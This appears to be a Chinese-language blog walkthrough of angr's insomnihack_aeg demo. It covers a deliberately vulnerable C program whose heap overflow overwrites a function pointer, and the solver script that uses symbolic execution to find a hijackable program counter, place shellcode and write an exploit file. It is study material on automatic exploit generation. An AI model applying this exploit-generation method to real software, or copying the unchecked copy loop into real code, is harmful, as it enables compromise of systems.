insomnihack_aeg 为官方提供的示例,用以展示 Angr 利用符号执行进行漏洞挖掘并自动生成 Exploit 的能力。代码 demo_bin.c 中存在堆溢出漏洞,通过脚本 solver.py 成功挖掘出该漏洞并自动生成 Exploit。

0x00 demo_bin.c

典型的堆溢出,第 21 行,由于未对边界条件进行检查,溢出数据覆盖函数指针,当 38 行调用 do_something() 时,导致 Crash。完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char component_name[128] = {0};

typedef struct component {
char name[32];
int (*do_something)(int arg);
} comp_t;

int sample_func(int x) {
printf(" - %s - recieved argument %d\n", component_name, x);
}

comp_t *initialize_component(char *cmp_name) {
int i = 0;
comp_t *cmp;

cmp = malloc(sizeof(struct component));
cmp->do_something = sample_func;

printf("Copying component name...\n");
while (*cmp_name)
cmp->name[i++] = *cmp_name++;

cmp->name[i] = '\0';
return cmp;
}

int main(void)
{
comp_t *cmp;

printf("Component Name:\n");
read(0, component_name, sizeof component_name);

printf("Initializing component...\n");
cmp = initialize_component(component_name);

printf("Running component...\n");
cmp->do_something(1);
}

0x01 Solve.py

漏洞原理很简单,不再赘述。利用符号执行判断是否存在控制流劫持,关键在于检测 EIP,若 EIP 完全被符号变量覆盖,则代表着控制流已被劫持。完整的 AEG 过程如下:
1)漏洞挖掘,带有前置约束及路径选择策略的符号执行;
2)分析发生崩溃时的 EIP 状态;
3)分析发生崩溃时的内存布局
4)构造约束条件;
5)约束求解,生成 Exploit。

1、漏洞挖掘

脚本中第 13 ~ 24 行,利用 SimulationManager 的 step() 方法,搜索二进制程序的状态空间。由于代码逻辑较为简单,因此在路径探索的过程中并未添加缓解路径爆炸的前置约束,也未采用路径选择策略,仅使用简单的 step()。循环执行,直到出现 unconstrained 状态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
p = angr.Project(binary)

binary_name = os.path.basename(binary)

extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}
es = p.factory.entry_state(add_options=extras)
sm = p.factory.simulation_manager(es, save_unconstrained=True)

# find a bug giving us control of PC
l.info("looking for vulnerability in '%s'", binary_name)
exploitable_state = None
while exploitable_state is None:
print(sm)
sm.step()
if len(sm.unconstrained) > 0:
l.info("found some unconstrained states, checking exploitability")
for u in sm.unconstrained:
if fully_symbolic(u, u.regs.pc):
exploitable_state = u
break

# no exploitable state found, drop them
sm.drop(stash='unconstrained')

l.info("found a state which looks exploitable")
ep = exploitable_state

2、分析 EIP

当检测到 unconstrained states 时,调用 fully_symbolic()方法,查看 EIP 中符号变量的数量。当 EIP 完全被符号变量覆盖时,代表控制流已被劫持。

1
2
3
4
5
6
7
8
9
10
def fully_symbolic(state, variable):
'''
check if a symbolic variable is completely symbolic
'''

for i in range(state.arch.bits):
if not state.solver.symbolic(variable[i]):
return False

return True

fully_symbolic()接收 state、variable 两个输入,用 state.arch.bits 判断所模拟系统的字长(The number of bits in a word),用 symbolic() 检测传入数据是否为符号值。该方法在“./angr/state_plugins/solver.py”中,实现代码如下:

1
2
3
4
5
6
7
def symbolic(self, e): # pylint: disable=R0201
"""
Returns True if the expression `e` is symbolic.
"""
if type(e) in (int, bytes, float, bool):
return False
return e.symbolic

在触发漏洞时,堆及 EIP 状态如下图所示。

调试结果如下:

3、分析内存状态

在满足unconstrained,且 EIP 完全被符号变量覆盖时,通过 find_symbolic_buffer() 检测内存中符号变量的布局情况,并构造约束条件。整个环节可分为查找符号输入、追踪符号变量、构造约束条件三个步骤。

1
2
3
4
5
# keep checking if buffers can hold our shellcode
for buf_addr in find_symbolic_buffer(ep, len(shellcode)):
l.info("found symbolic buffer at %#x", buf_addr)
memory = ep.memory.load(buf_addr, len(shellcode))
sc_bvv = ep.solver.BVV(shellcode)

1)查找符号输入
查找符号输入、追踪符号变量在find_symbolic_buffer()中实现,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def find_symbolic_buffer(state, length):
'''
dumb implementation of find_symbolic_buffer, looks for a buffer in memory under the user's
control
'''

# get all the symbolic bytes from stdin
stdin = state.posix.stdin

sym_addrs = [ ]
for _, symbol in state.solver.get_variables('file', stdin.ident):
sym_addrs.extend(state.memory.addrs_for_name(next(iter(symbol.variables))))

for addr in sym_addrs:
if check_continuity(addr, sym_addrs, length):
yield addr

此处需注意,Angr 在处理 scanf 的输入数据时,采用 streams 模式。不仅如此,默认情况下,stdin、stdout、stderr 均采用该模式。原文如下

Believe it or not, this simpler abstraction for streams will benefit symbolic execution. Consider an example program that calls scanf N times to read in N strings. With a traditional SimFile, as we do not know the length of each input string, there does not exist any clear boundary in the file between these symbolic input strings. In this case, angr will perform N symbolic reads where each read will generate a gigantic tree of claripy ASTs, with string lengths being symbolic. This is a nightmare for constraint solving. Nevertheless, the fact that scanf is used on a stream (stdin) dictates that there will be zero overlap between individual reads, regardless of the sizes of each symbolic input string. We may as well model stdin as a stream that comprises of consecutive packets, instead of a file containing a sequence of bytes. Each of the packet can be of a fixed length or a symbolic length. Since there will be absolutely no byte overlap between packets, the constraints that angr will produce after executing this example program will be a lot simpler.
The key concept involved is “short reads”, i.e. when you ask for n bytes but actually get back fewer bytes than that. We use a different class implementing SimFileBase, SimPackets, to automatically enable support for short reads. By default, stdin, stdout, and stderr are all SimPackets objects.

调试结果与文档描述一致:

2) 追踪符号变量
state.posix.stdin为传入程序的全部符号变量,使用state.solver.get_variables() 追踪内存中的符号变量。该函数位于“./angr/state_plugins/solver.py”中,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def get_variables(self, *keys):
"""
Iterate over all variables for which their tracking key is a prefix of the values provided.

Elements are a tuple, the first element is the full tracking key, the second is the symbol.

>>> list(s.solver.get_variables('mem'))
[(('mem', 0x1000), <BV64 mem_1000_4_64>), (('mem', 0x1008), <BV64 mem_1008_5_64>)]

>>> list(s.solver.get_variables('file'))
[(('file', 1, 0), <BV8 file_1_0_6_8>), (('file', 1, 1), <BV8 file_1_1_7_8>), (('file', 2, 0), <BV8 file_2_0_8_8>)]

>>> list(s.solver.get_variables('file', 2))
[(('file', 2, 0), <BV8 file_2_0_8_8>)]

>>> list(s.solver.get_variables())
[(('mem', 0x1000), <BV64 mem_1000_4_64>), (('mem', 0x1008), <BV64 mem_1008_5_64>), (('file', 1, 0), <BV8 file_1_0_6_8>), (('file', 1, 1), <BV8 file_1_1_7_8>), (('file', 2, 0), <BV8 file_2_0_8_8>)]
"""
for k, v in self.eternal_tracked_variables.items():
if len(k) >= len(keys) and all(x == y for x, y in zip(keys, k)):
yield k, v
for k, v in self.temporal_tracked_variables.items():
if k[-1] is None:
continue
if len(k) >= len(keys) and all(x == y for x, y in zip(keys, k)):
yield k, v

返回值为元组,调试结果如下:

通过 state.memory.addrs_for_name() 返回包含符号变量的内存地址。

1
2
3
4
5
6
def addrs_for_name(self, n):
"""
Returns addresses that contain expressions that contain a variable
named `n`.
"""
return self.mem.addrs_for_name(n)

调试结果:

至此,已能够通过输入数据控制 EIP 以及部分内存空间,后续要考虑的是 Payload 的布局问题。

3)构造约束条件
Exploit 采用 ret2text 方式且不考虑安全机制,因此仅需找到一片足以放置 shellcode 的连续地址即可。示例中 shellcode 大小为 22。检查空间连续性的函数如下:

1
2
3
4
5
6
7
8
9
10
11
def check_continuity(address, addresses, length):
'''
dumb way of checking if the region at 'address' contains 'length' amount of controlled
memory.
'''

for i in range(length):
if not address + i in addresses:
return False

return True

成功执行后,返回满足条件的起始地址,并将shellcode 转换为 BVV。

1
2
memory = ep.memory.load(buf_addr, len(shellcode))
sc_bvv = ep.solver.BVV(shellcode)

至此,构造生成 Exploit 的约束条件如下:

  • memory == sc_bvv
  • ep.regs.pc == buf_addr

4、约束求解

通过 satisfiable() 检查约束条件是否可解。

1
2
3
4
5
6
7
# check satisfiability of placing shellcode into the address
if ep.satisfiable(extra_constraints=(memory == sc_bvv,ep.regs.pc == buf_addr)):
l.info("found buffer for shellcode, completing exploit")
ep.add_constraints(memory == sc_bvv)
l.info("pointing pc towards shellcode buffer")
ep.add_constraints(ep.regs.pc == buf_addr)
break

约束可解,生成 Exploit。

1
2
3
4
5
6
filename = '%s-exploit' % binary_name
with open(filename, 'wb') as f:
f.write(ep.posix.dumps(0))

print("%s exploit in %s" % (binary_name, filename))
print("run with `(cat %s; cat -) | %s`" % (filename, binary))

0x02 总结

该示例完整展示了 AEG 的全过程。通过调试,加深了对符号执行的理解。由于本例并不涉及符号执行所面临的路径爆炸与路径选择,因此对于理解前置约束条件及路径选择策略的助益并不明显,但对于理解符号变量以及内存布局还是起到一些作用。对于 AEG 来说,由于约束求解的问题不在考虑范围之内,控制流劫持的检测基本聚焦为 EIP 的检测。因此,如何根据崩溃点的内存布局及 Payload 情况,构造出合适的约束条件,成为问题的关键。